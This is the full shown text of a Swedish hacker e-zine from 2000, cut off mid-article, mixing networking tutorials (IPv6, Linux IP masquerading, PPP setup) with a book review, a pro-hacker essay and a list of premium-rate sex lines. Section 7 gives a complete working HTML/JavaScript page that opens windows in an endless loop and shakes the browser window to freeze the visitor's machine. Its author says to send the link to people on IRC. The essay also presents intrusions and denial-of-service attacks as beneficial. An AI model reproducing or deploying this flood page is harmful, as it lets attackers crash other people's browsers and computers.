1465 lines
64 KiB
Plaintext
1465 lines
64 KiB
Plaintext
|
||
,$$$$$$$$$. ....' `üe. ....' `üe.
|
||
,$' `$ $ ,e' ,eeeee. `$. ,e' ,eeeee. `$.
|
||
.$' ,eeeee. `$$ $',$$$$$$$$$. $ $',$$$$$$$$$. $
|
||
$',$$$$$$$$$.`$ $ $$$' `$$$ $ $ $$$' `$$$ $
|
||
.$,$$$',. `$$$. $$ $$$ $$$.`$$ $ $ $$$ $$$.`$$ $
|
||
,$$$',$$$.`$$$' $ $$$ $$$.`$$ $ $ $$$ $$$.`$$ $
|
||
.$ $$$ $' `$ $$$ $' $$$.`$`$.`$ ' $ $$$.`$`$.`$ '
|
||
$ $$$ $. ,$ `$$ $ $ $$$.`$`$.`$ ' $ $$$.`$`$.`$ '
|
||
$ $$$ $$$$ý `$ $'$.`$$$.`$`$.` $ $.`$$$.`$`$.` $
|
||
$ $$$ $ý',ee. ` $'`$.`$$$.`$ `$$' `$.`$$$.`$ `$$'
|
||
$ $$$ ',$$$$$$. $' $.`$$$.`$ $' `$.`$$$.`$ $'
|
||
, $$$ $$$ $$$ $' `$.`$$$.`$ $' `$.`$$$.`$ $'
|
||
$ $$$ $$$ $$$ $' .`$.`$$$.`$$' .`$.`$$$.`$$'
|
||
$ $$$ `$$ $$$ $',$ü$`$.`$$$.`$' ,$ü$`$.`$$$.`$'
|
||
$ $$$ $ `$ $$$ $ $ .`$`$.`$$$.` $ .`$`$.`$$$.`
|
||
$$$$ `$.` $$$ $ $ $.`$`$.`$$$ $ $ $.`$`$.`$$$ $
|
||
.`$$$. ` ,e$$ $' $ $$.`ee$ $$$ . $ $$.`ee$ $$$ .
|
||
$.`ü$$$$$$$$$'; $ $$$.`' ,$$$ $ $ $$$.`' ,$$$ $
|
||
$.$$$$$$$$$$$' $.`$$$$$$$$$' $ $.`$$$$$$$$$' $
|
||
$. `ýüüüý $`$. `ýüüüý' ,$' `$. `ýüüüý' ,$'
|
||
`$$eeeeeee$$ .`$$eeeeeee$$' .`$$eeeeeee$$' .
|
||
|
||
G O T H E N B U R G S E C R E T S E R V I C E
|
||
|
||
#2
|
||
|
||
|
||
|
||
Nr. 002 2000-09-15
|
||
////////////////////////////////\/\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
/ 1. Ledare......................................Gotrex Gurnisson\
|
||
/ 2. I-mode......................................Gotrex Gurnisson\
|
||
/ 3. Pr0n nummer.................................Gotrex Gurnisson\
|
||
/ 4. Introduktion till IPv6...............................hedback\
|
||
/ 5. Bok reccension: Hacking Exposed.............Gotrex Gurnisson\
|
||
/ 6. Uppsats: Vi hackare är inte olagliga........Gotrex Gurnisson\
|
||
/ 7. Enkel html-flood.....................................Blazter\
|
||
/ 8. IP-Masquerading under linux..........................hedback\
|
||
/ 9. PPP i linux..........................................hedback\
|
||
/10. Internet Pirater, eller?.............................hedback\
|
||
/11. 2600seGBG...................................Gotrex Gurnisson\
|
||
/12. Faserna i ett IT-anfall..............................Zynta^x\
|
||
/13. Datorsystemets Penetreringsnivåer....................Zynta^x\
|
||
/14. Bra metoder för att förhinda dataintrång.............Zynta^x\
|
||
/15. Svenska h/p zines A till Ö..................Gotrex Gurnisson\
|
||
/16. Intervju med pewp ang. S&S artikeln.........Gotrex Gurnisson\
|
||
/ + länkar \
|
||
////////////////////////////////\/\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
| Disclaimer |
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
All information i den här tidningen är enbart teoretisk,
|
||
den har aldrig utförts på något sätt och särkillt aldrig
|
||
så att den bryter mot lagen. Skribenter i tidningen kan
|
||
inte stå för svars för vad som har skrivits. Det är DU
|
||
och enbart DU som står för svars för dina handlingar.
|
||
|
||
////////////////////////////////\/\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
| 1. Ledare Gotrex |
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
Välkomna till nummer två av GSS. Efter vårt första nummer fick vi
|
||
både bra och dålig kritik, som väntat. Och det är bra så att vi
|
||
kan anpassa oss. Vi har haft 733 stycken besökare och det kanske
|
||
skall påpekas och förhoppningsvis så har majoriteten läst zinet
|
||
också :P Även så hade TheClown tagit sig tid och lagt upp oss
|
||
på ThisGeneration. Nu finns tyvärr inte TG mer men ändå.. Där
|
||
fick vi iallafall en hel del läsare. GSS har lagt upp en
|
||
zines sektion på http://members.xoom.com/_XMCM/msadf/zines/ men
|
||
tyvärr har jag bara begränsat med utrymme så jag fyllde
|
||
det lilla vi hade ganska snabbt. Om nån har en webserver
|
||
där vi kan ha våran sida så kontakta mig.
|
||
|
||
Nu har det bestämts att man får sätta upp kameror i spårvagnarna
|
||
i Göteborg (10st i varje vagn!) och VPS (Virtuell Parking System)
|
||
som testas i Stockholm och skall även testas i Göteborg.. Vi
|
||
väntar med spänning inför framtiden.. sedan har jag hållt på att
|
||
åtminstonde försöka komma på telia refill koderna hur dom är upp-
|
||
byggda etc Om nån har några eller vet nåt intressant så hör gärna
|
||
av er. Även om ni vet nåt om de andra lokala sakerna så..
|
||
2600 feber i Sverige med lokala möten lite varstans även i
|
||
Göteborg där jag var. Läs 2600seGBG.
|
||
|
||
|
||
Gotrex Gurnisson
|
||
|
||
Email: Gotrex@antionline.org
|
||
VMB: 031 7943192
|
||
URL: http://www.GothenburgSecretService.net
|
||
|
||
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
\ \
|
||
/ ...förresten, vad är ett nätverk? /
|
||
\ - Bill Gates, 1984 \
|
||
/ /
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
|
||
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
| 2. I-Mode Gotrex |
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
I-Mode är Japans svar på WAP dvs interaktiva tjänster i mobil
|
||
telefonen. Det är företaget NTT Docomo (Nippon Telegraph and Tele-
|
||
phone Corporation) som redan har lyckats få 6 miljoner Japaner att
|
||
ansluta sig till I-mode. NTT Docomo startade 1991 och I-mode
|
||
lanserades 1999. Ordet Docomo betyder "överallt" på japanska.
|
||
I-mode som betyder Interactive Mode, har förmodligen fått sitt
|
||
namn av 'I' knappen som man lätt kommer ut på Internet med.
|
||
I-modes funktioner är att man kan kolla hur mycket pengar man har
|
||
på sitt kredit kort, köpa och sälja aktier, beställa böcker,
|
||
skaffa försäkring, restaurang guide, recept, ordbok, tidtabeller,
|
||
nyheter, väder och spel. Även email på 250 st tecken är möjligt.
|
||
Skillnaden mot WAP (läs landers text om WAP) är att man surfar
|
||
på en förenklad version av html deras CWML (Compact Wireless
|
||
Markup Language). Internets html istället som WAP ett helt eget
|
||
(Internet). Man betalar för hur mycket data som man tankar ner
|
||
eller rättare sagt tar emot. I dags läget är det 9,6kbps men max
|
||
hastigheten är 2mbps. I-mode klarar även av grafik och enklare
|
||
animationer. Som dagens WAP inte klarar av ännu.
|
||
|
||
|
||
|_ <--> Docomo Packet Network <--Internet--> ISP
|
||
| | Imode Server <--Leased circuit--> ISP
|
||
|_|
|
||
<--> Voice Network
|
||
|
||
|
||
|
||
En liten detalj är att det 11 siffriga (Japanska nummer) telefon-
|
||
nummrerna fungerar som email adress t.ex 0908382XXXX@docomo.ne.jp.
|
||
|
||
Telefoner som stöder I-mode:
|
||
P501i HYPER
|
||
Ericsson ER207
|
||
Nokia NM502i
|
||
|
||
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
\ \
|
||
/ "Det finns ingen väg till lyckan, vägen är lyckan." /
|
||
\ - Buddha \
|
||
/ /
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
| 3. pr0n nummer Gotrex |
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
OBS! ALLA DESSA NUMMER KOSTAR TYP 19,95KR PER MINUT RING INTE FRÅN
|
||
EGET ABBONEMANG OBS!
|
||
|
||
|
||
071757575
|
||
071215263
|
||
071696969
|
||
071666999
|
||
071612054
|
||
071610012
|
||
071610013
|
||
071612059
|
||
071612047
|
||
071612051
|
||
071612046
|
||
071612047
|
||
071612048
|
||
071612049
|
||
071215263
|
||
072411111
|
||
072787878
|
||
0727854445
|
||
086670742
|
||
087480118
|
||
0850302000 \
|
||
0850308000 )- Klassiska Heta Linjen
|
||
0850301900 /
|
||
0406808083
|
||
0406406699
|
||
0406406699
|
||
0406406601
|
||
0406406602
|
||
0406406603
|
||
0406406604
|
||
0406406605
|
||
0406406606
|
||
0406406607
|
||
0406406608
|
||
0406406609
|
||
0406406610
|
||
0406808081
|
||
0406807865
|
||
0406807866
|
||
0406807879
|
||
00916644105177
|
||
0096836479
|
||
0096838399
|
||
0096836378
|
||
09441060000
|
||
09441166664
|
||
09441166662
|
||
|
||
|
||
OBS! ALLA DESSA NUMMER KOSTAR TYP 19,95KR PER MINUT RING INTE FRÅN
|
||
EGET ABBONEMANG OBS!
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
\ We can manipulate you however we want. \
|
||
/ We can read and change your Personal datas. /
|
||
\ We can take your identity. \
|
||
/ Kill your existance. /
|
||
\ We can come near to you from everywhere in the world. \
|
||
/ You can´t escape! /
|
||
\ - UHA \
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
| 4. Introduktion till IPv6 hedback|
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
Man tror att dom tillgängliga ip-adresserna i världen kommer att
|
||
ta slut ca år 2005... och när ip-adresserna tar slut så betyder
|
||
det helt enkelt att det inte går att ansluta något, som behöver
|
||
en ip, till internet. Eftersom våra äldre bröder är så pass
|
||
smarta, så har man sedan slutet på 1991 börjat utveckla ett nytt
|
||
sätt som ska klara av att skapa mer ip-adresser i ett nätverk.
|
||
Denna nya standard ska då kunna klara av att dela ut 3,40 x 10^38
|
||
adresser. Detta är betydligt mer än dagens IPv4, som man
|
||
uppskattar ska klara av att dela ut ca 4 x 10^12 adresser.
|
||
|
||
Varför nu detta? Räcker inte fyra miljarder ip-adresser till när
|
||
vi är färre människor än så på jorden?
|
||
Nej, det gör inte det. Man kan ju förvisso bortse från alla U-
|
||
länder, för jag kan inte tänka mig att människor som inte har
|
||
mat för dagen sitter med en dator, eller? Vidare kan man räkna
|
||
bort alla infödingar i Afrika, folk över 120(?), och min mongo
|
||
granne i trapphuset brevid. Iaf, detta beror på att utdelningen
|
||
av dessa ip-adresser inte fungerar nå vidare. Det händer (och
|
||
fötter) att stora företag som behöver max 1000 ip-adresser får
|
||
närmare 30 000, beroende vilket sorts nät dom använder. Då är
|
||
det en 29 000 adresser som inte användes, men blir oanvändbara
|
||
ändå. Det nya systemet, IPv6, gör så att man inte behöver spara
|
||
på adresserna... Inte för att dom sparar på dom nu, men ändå.
|
||
Det nya med IPv6 [Ed.'s note: eller IPng, ng för Next Generation]
|
||
är inte enbart att man får hur jävla många miljarder ip-adresser
|
||
som helst, utan man har även lagt till nya saker såsom säkerhets
|
||
funktioner och prioritetsfunktioner. Dessa två nya funktioner
|
||
tänker jag inte gå in mer på i denna enkla introduktions txt.
|
||
|
||
Det finns tre olika sätt att skriva adresserna som txtsträngar.
|
||
Det första sättet är att skriva ut hela adressen i hexadecimala
|
||
värden, vilket inte är nått större problem. (enkelt att komma
|
||
ihåg oxå).
|
||
Ex: XXXX:1X1X:111X:111:XXXX:11:1111:1X11
|
||
|
||
Andra sättet är komprimerad och inga nollvärden tas med.
|
||
Ex: XX11::111X:11 (dubbla kolon betyder att allt mellan dessa är
|
||
nollor).
|
||
|
||
Tredje sättet är ifall man måste ha med en IPv4 adress.
|
||
Ex:1:1:1:1:1:1:199.161.122.165
|
||
|
||
IPv6 ligger än så länge på ett försöksstadium, och om man vill
|
||
testa kan man smurfa till url'en www.6bone.net som är ett nätverk
|
||
öppet för dom som vill testa den nya standarden. Finns lite annat
|
||
där oxå, som rör IPv6... t ex vilka länder som är med och
|
||
utvecklar mm. Har du linux, som alla elite ppl har, så är det
|
||
bara att fixa en IPv6 adress. Men om du är trogen Windows user så
|
||
får du vänta en stund tills Micro$oft släpper dom tilläggen som
|
||
du behöver för att kunna nyttja IPv6. Till NT så vet jag att dom
|
||
håller på och utvecklar... Men har ingen aning om det oxå kommer
|
||
att finnas till vanliga och tråkiga Win9.X.
|
||
|
||
Nästa steg efter 128 blir väll 256 bits ip-adresser osv.
|
||
Jaja, den som lever får se brukar man ju säga...
|
||
|
||
Texten presenteras i samarbete med Team DreamVizion.
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
\ "If I have seen further, it is because \
|
||
/ I have been standing on the shoulders /
|
||
\ of giants" \
|
||
/ - Isaac Newton /
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
| 5. H a c k i n g E x p o s e d Gotrex |
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
Mycket bra bok som beskriver hur man går till väga när
|
||
man lär sig om olika operativ system och hur man undgår
|
||
säkerheten och givetivis hackar. Även en del telefon trixs
|
||
finns med som war dialing m.m Boken är indelad i olika
|
||
kapitel och sedan står det steg för steg hur man skall gå
|
||
tillväga. De olika kapitlerna är:
|
||
|
||
I Cashing the establishment: Footprinting, Scanning, Enumeration
|
||
|
||
II System Hacking: Hacking Win95/98, Hacking Win NT, Novell
|
||
Netware Hacking, Unix
|
||
|
||
III Network Hacking: Dial-up and VPN hacking, Network Devices,
|
||
Firewalls, Denial of Service Attacks
|
||
|
||
IV Software Hacking: Remote Control Insecurities, Advanced
|
||
Techniques, Web hacking
|
||
|
||
Minus för att hemsidans länkar inte är uppdaterade. Tycker
|
||
att det borde föjlt med en CD-ROM med alla programmen. Och
|
||
jag tycker också att det är lite väl mycket genomgång av
|
||
olika "kokboks program" dvs program som gör allt åt en.
|
||
Sammanfattningsvis så är det faktiskt en bra bok som både
|
||
nybörjaren och den mest erfarne kan läsa.
|
||
|
||
Hacking Exposed av George Kurtz, Stuart McClure och Joel
|
||
Scambray finns att köpa på www.bokus.se eller www.amazon.com
|
||
Kostar runt 400-500kr.
|
||
Betyg: MVG-
|
||
http://www.hackingexposed.com
|
||
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
/ Make my word a crime, I will cry out louder \
|
||
\ Silence my voice, I will find another /
|
||
/ Make my voice a crime, I will create a new one \
|
||
\ Hunt me down, I will find a new place to hide /
|
||
/ Lock me away, Ten will rise to take my place \
|
||
\ You cannot silence me, You cannot stop me, I and my /
|
||
/ kind are forever \
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
| 6. Uppsats: Vi hackare är inte olagliga Gotrex |
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
På senaste tiden har "hackers" och enligt min mening förfulat
|
||
"hackare" fått skulden för i olika medier för att vara brotts-
|
||
lingar och ligister. Detta är den allmänna uppfattningen som
|
||
man kommer fram till när man hör och läser om "hackare" i
|
||
tidningar. Dessa relativt okända individer beskrivs vara ligister
|
||
som förstör bankomater, telefon boxar och manipulerar hemsidor och
|
||
dessa "hackers" jämförs med andra brottslingar. Ofta hamnar sådana
|
||
incidenter på löpsedlarna med stor tyngd på att det skulle varit
|
||
en dator "hackare" i farten igen.
|
||
Även i personer som t.ex. hackat sig in hos NASA dömts till
|
||
dagsböter. I Sverige finns det en lag på max straff på två år
|
||
men än så länge har inte fängelsestraff delats ut för den här
|
||
typen av brott. I USA däremot så är straffen däremot betydligt
|
||
strängare, upp till 60 år. Kan det vara så att ni missbedömt dessa
|
||
personer ni inte vet någonting om? Jag anser bestämt att så är
|
||
fallet. Massmedia förmedlar en av bild "hackare" som inte
|
||
stämmer överens med sanningen. En "hackares" mål är inte att
|
||
förstöra, om vi tittar på en hackares s.k. budord, regler:
|
||
"informationen skall vara fri" dvs. totalt obegränsad. Med
|
||
detta menas att alla har rätt att bruka datorer och att
|
||
informationen skall vara helt fri. Information kan vara t.ex.
|
||
innehållet på Internet. Också program skall vara fritt till-
|
||
gängligt för alla. Det är därför vi ser en uppåt gående
|
||
trend av "freeware", program som är helt kostnad fria
|
||
och "open source" dvs. källkoden är tillgänglig för alla. En
|
||
"hackare" bedömer inte andra utifrån ålder, ras eller position i
|
||
samhället utan istället beroende på hur duktigt han eller hon är.
|
||
Ingenting eller någon skall komma till skada när hackare använder
|
||
sina kunskaper. Detta är inte en galen brottsling som följer
|
||
sådana här ädla lagar. Nej detta är enligt myten en duktig
|
||
tonåring vars förmåga att hantera överstiger de flesta. Om
|
||
sanningen skall fram så finns det "hackare" i alla åldrar,
|
||
länder, samhällsklasser och arbeten. Vaddå kanske ni tänker, han
|
||
som förstör måste väl i vilket fall stå till förvars? Ja
|
||
personer som förstör saker skall dömas därefter men skulden
|
||
skall inte ligga på data hackers vara sig det har med teknik
|
||
eller något annat att göra. De som förstör är ligister,
|
||
sabotörer, fifflare eller terrorister beroende på vad brottet är.
|
||
Nu över till de riktiga "hackarna" som tar sig in i datasystem
|
||
och ändrar en fil och skriver ut ett lustigt meddelande på
|
||
skrivarna, tjuvkikar och samtidigt påvisar den bristande säker-
|
||
heten. Är dessa brottslingar som begår olagliga handlingar? I min
|
||
mening är de snarare välgörare mer än tjuvar. På många företag
|
||
finns inte någon säkerhet och på ställen där den borde vara
|
||
superb är den endast minimal. Ta istället och anställ någon som
|
||
verkligen kan något t.ex. tidigare hackare. Många av dessa
|
||
tidigare kallade brottslingar får i början betala böter och/eller
|
||
skadestånd. Efter detta så belönas de med väl betalda IT jobb.
|
||
Tre konkreta exempel som är värda att nämnas är Jon Johansen, den
|
||
dåvarande sextonåriga norrmannen som "knäckte" DVD-skyddet vilket
|
||
hindrar en från att kopiera filmerna (skivorna) har fått jobb
|
||
på spel utvecklings företaget WAP factory. Den nästan legend
|
||
förklarade Kevin Mitnick som suttit fem år i fängelse har fått
|
||
erbjudande att bli säkerhets rådgivare åt senaten och de två
|
||
svenskar som anklagas för att ha brutit sin in hos NASA, hör
|
||
och häpna, fick jobb erbjudande innan ens rättegången hade
|
||
börjat. Är dessa personer våra värsta fiender som vi så snällt
|
||
på detta rimliga sätt behandlar. Vi bör istället värna om våra
|
||
unga, duktiga hackare som ser till att säkerheten ökar och att
|
||
säkerheten tas på allvar.
|
||
Två väldigt viktiga aspekter i början av 2000-talet, IT ålderns
|
||
guld ålder? För ett år sedan lite drygt så sänktes de största
|
||
hemsidorna på Internet bland annat CNN.com och yahoo.com av
|
||
åtskilliga så kallade "Denial Of Service". Detta bevisar att om de
|
||
bästa och största sidorna på Internet kan 'stängas ner' så är
|
||
resten av Internet sårbart också. Jag tycker detta var positivt
|
||
snarare än negativt eftersom även här får vi upp ögonen för
|
||
att säkerheten brister och priset för detta var endast att sidorna
|
||
inte blev tillgängliga under en viss tid. Nu i samband med att det
|
||
svenska bredbands nätet byggs ut kommer allt fler behöva ta sig en
|
||
funderare om ni, var och en är säkra. Är Windows så säkert som
|
||
Microsoft fått er att tro? Skulle inte tro det. Är hackare din
|
||
värsta fiende eller din bästa vän? Det senare är mitt och
|
||
förhoppningsvis ert blivande intryck.
|
||
|
||
|
||
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
\ \
|
||
/ "If you build it we will hack" /
|
||
\ \
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
| 7. Enkel html-flood Blazter|
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
Jag har gjort en liten HTML-flood, den är jävligt simpel, men
|
||
extremt effektiv och smidig. Skicka bara över urlen till t ex
|
||
nån som håller på och floodar på IRC och......borta! Det tog
|
||
mindre än en minut att låsa min P2 400 MHz med 128 mb ram! Den
|
||
skulle kunna göras effektivare, men det behövs inte... sen är det
|
||
bra att om man är snabb kan killa browsern.... det klarar ju ändå
|
||
inte en lamer.... och använd bara det här tricket mot folk som
|
||
tigger om det.
|
||
|
||
|
||
/* -------------------- html-flood.html ----------------------- */
|
||
<HTML>
|
||
<HEAD>
|
||
<TITLE>DIE!</TITLE>
|
||
<SCRIPT LANGUAGE="JavaScript">
|
||
total=0;
|
||
function kill()
|
||
{
|
||
i=0;
|
||
while(i < 1)
|
||
{
|
||
window.open("http://www.hotmale.com");
|
||
}
|
||
}
|
||
</SCRIPT>
|
||
<script language="javascript">
|
||
if (document.layers || document.all)
|
||
{
|
||
a=1;
|
||
setInterval("Jump()",10);
|
||
}
|
||
function Jump()
|
||
{
|
||
a=a+.1;
|
||
self.moveBy((Math.random()*a*200 -a),(Math.random()*a*200)-a);
|
||
}
|
||
</script>
|
||
</HEAD>
|
||
<BODY onload="kill()" BGCOLOR="000000" TEXT="00FF00">
|
||
<h1>Congrationlations you will now have the honour to be killed
|
||
by Blazter of DreamVizion!<br>
|
||
Moahahahahahahahaha! =P
|
||
</BODY>
|
||
</HTML>
|
||
/* ------------------------ EOF ------------------------------- */
|
||
|
||
|
||
Texten presenteras i samarbete med Team DreamVizion.
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
\ \
|
||
/ "Den som inte känner till vad som hände innan /
|
||
\ han föddes förblir ett barn" \
|
||
/ - Kiko (Romersk talare) /
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
| 8. IP-Masquerading under linux hedback|
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
Denna text kommer att ta upp vad IP-Masquerading, eller som det
|
||
heter på svenska, IP-Maskering är och hur du konfigurerar det.
|
||
Jag kommer att använda mina inställningar, som fungerar för mig,
|
||
som exempel. Det är därför inte säkert att du lyckas få till det
|
||
på din burk med samma inställningar. Grundkraven som denna txt
|
||
förutsätter att du uppfyller är ett fungerande nätverk och en
|
||
linuxdator med Internetuppkoppling.
|
||
|
||
Det som IP-maskeringen gör är att om du har flera datorer i ett
|
||
nätverk, men endast en av dessa med internetuppkoppling, så kan
|
||
du få alla datorer att dela på samma. Vilket kan vara väldigt
|
||
praktiskt.
|
||
|
||
Nå, hur funkar då detta?
|
||
Vi tar ett exempel. Om du är ute och surfar, och så vill du till
|
||
http://www.av.com då så skickas en signal ifrån din dator (via
|
||
linuxburken) till den dator som du vill komma till. När detta
|
||
paket passerar linuxburken med internetuppkopplingen så skriver
|
||
den om början på paketet så att www.av.com tror att paketet
|
||
kommer direkt ifrån linuxburken. Sen så svarar servern, och
|
||
huvudet på paketet skrivs om igen av linux, och skickar det
|
||
vidare till den datorn man sitter vid, som då tror att den fick
|
||
svaret direkt från servern osv. Hänger du med?
|
||
|
||
Hur konfigurerar man IP-maskeringen?
|
||
Först så ska du titta efter ifall filen /proc/net/ip_masquerade
|
||
finns. Om den inte finns så måste du kompilera om din kärna med
|
||
stöd för detta. Men eftersom dom flesta oftast har stöd för
|
||
detta från början så få det bli en annan txt.
|
||
|
||
Ok. Då fortsätter vi. Först så måste du säga åt linux att den ska
|
||
skicka vidare paket vilket görs med kommandot:
|
||
|
||
# echo "1" >/proc/sys/net/ipv4/ip_forward
|
||
|
||
Sen så ska du använda ipchains för att tala om vilka ip-nummer
|
||
som ska maskeras och inte. Jag använder klass C serien, dvs
|
||
192.168.0.1 -> 192.168.255.254. Jag använder följande kommandon:
|
||
(Tänk på att du måste ha ipchains installerat...)
|
||
|
||
#ipchains -P forward DENY
|
||
|
||
Detta gör att datorn inte skickar någonting vidare som inte
|
||
matchar andra regler.
|
||
|
||
#ipchains -A forward -j MASQ -s 192.168.0.0/24 -d 0/0
|
||
|
||
Detta talar om för datorn att den ska maskera allt från
|
||
192.168.0.0/24 till alla andra destinationer. 192.168.0.0/24
|
||
talar om alla datorer med ett ip-nummer som börjar på 192.168.0.0
|
||
med netmask 255.255.255.0
|
||
|
||
Då är konfigurationen på linuxburken klar. Nästa steg är att
|
||
konfigurera dom andra datorerna i ditt nätverk att använda
|
||
linuxburken som standard gateway. I linux så görs det med
|
||
kommandot:
|
||
|
||
# route add default gw
|
||
|
||
I Win så görs det via Kontrollpanelen -> Nätverk eller ett
|
||
högerklick på Nätverks ikonen på skrivbordet. Klicka fram dig
|
||
till inställningarna för TCP/IP och lägg till IP-nummret för
|
||
standard gateway under Gateway, dvs linuxburkens ip-nummer. Sen
|
||
så måste du skriva in ip-adresserna till DNS'erna hos din isp
|
||
under DNS-konfigurationen (vanligtvis 10.0.0.1/2). Nu så är det
|
||
klart. Starta om Windows och testa att smurfa. Några få
|
||
inställningar kan behövas göra med din webläsare & e-post progg
|
||
osv. Linuxburken behöver du inte starta om.
|
||
Good Luck!
|
||
|
||
|
||
Texten presenteras i samarbete med Team DreamVizion.
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
\ \
|
||
/ "Security is a process, not a product." /
|
||
\ - Bruce Schneier \
|
||
/ /
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
|
||
|
||
//////////////////////////////////////////////////////////////////
|
||
| 9. PPP i linux hedback|
|
||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||
|
||
För att ansluta till internet via modem så används protokollet
|
||
PPP i linux. Om din isp stöder PAP (Password Authentication
|
||
Protocol) vilket nästan alla gör idag, så är det inga problem.
|
||
Om den däremot inte gör det så får man pilla lite mer innan allt
|
||
funkar som det ska.
|
||
|
||
Först så måste du ansluta och starta modemet om inte det redan är
|
||
gjort. När det är gjort så måste du tala om för linux vilken com
|
||
port som modemet är kopplad till. Det gör du genom att skapa en
|
||
symbolisk länk /dev/modem till den fil i /dev som motsvarar
|
||
porten modemet är ansluten till.
|
||
|
||
DOS namn: linux namn: (äldre kärna)
|
||
COM1 /dev/ttyS0 /dev/cua0
|
||
COM2 /dev/ttyS1 /dev/cua1
|
||
COM3 /dev/ttyS2 /dev/cua2
|
||
COM4 /dev/ttyS3 /dev/cua3
|
||
|
||
Om ditt modem sitter som mitt på COM1 skriver du:
|
||
|
||
# cd /dev
|
||
# ln -s ttyS1 modem
|
||
|
||
- Med PAP -
|
||
Starta linuxconf och välj Config -> Networking -> Client tasks ->
|
||
PPP/SLIP/PLIP. Välj sedan Add. Markera PPP och tryck Accept. Då
|
||
skickas du vidare till nästa skärm där du ska ange användarnamn,
|
||
lösenord, telefonnumret till modempolen, modemporten och att du
|
||
vill använda PAP. Tryck Accept.
|
||
|
||
Nu tillbaka till linuxconf där du ska välja "Name server
|
||
specification (DNS)" för att ange dina DNS servrar. Vanligtvis
|
||
så har dom IP-adresserna 10.0.0.1 och 10.0.0.2. Men du kan alltid
|
||
fråga din isp om detta.
|
||
|
||
DNS
|
||
Algonet Primär: 194.213.74.1
|
||
Algonet Sekundär: 194.213.64.33
|
||
LibertySurf Primär 212.139.0.3
|
||
LibertySurf Sekundär 212.139.0.2
|
||
NetLink Primär: 212.242.40.3
|
||
NetLink Sekundär: 212.242.40.51
|
||
SBBS2 Primär: 212.112.0.10
|
||
SBBS2 Sekundär: 212.112.0.11
|
||
Tele2/SwIPNet Primär: 192.71.220.10
|
||
Tele2/SwIPNet Sekundär: 130.244.127.161
|
||
Telenordia Primär: 194.213.72.4
|
||
Telenordia Sekundär: 194.213.72.11
|
||
Telia Primär: 131.115.15.7
|
||
Telia Sekundär: 131.115.115.50
|
||
Utfors Primär: 130.239.8.10
|
||
Utfors Sekundär: 195.58.103.18
|
||
|
||
Sunet har en bra DNS som du kan använda i annat fall:
|
||
|
||
Sunet Primär: 192.36.125.2
|
||
Sunet Sekundär: 192.36.144.17
|
||
|
||
(tack till ecco@lugu.org för DNS listan)
|
||
|
||
Nu så kan du prova om det fungerar med programmet ifup via
|
||
promten. Om din förbindelse heter PPP0 skriver du:
|
||
|
||
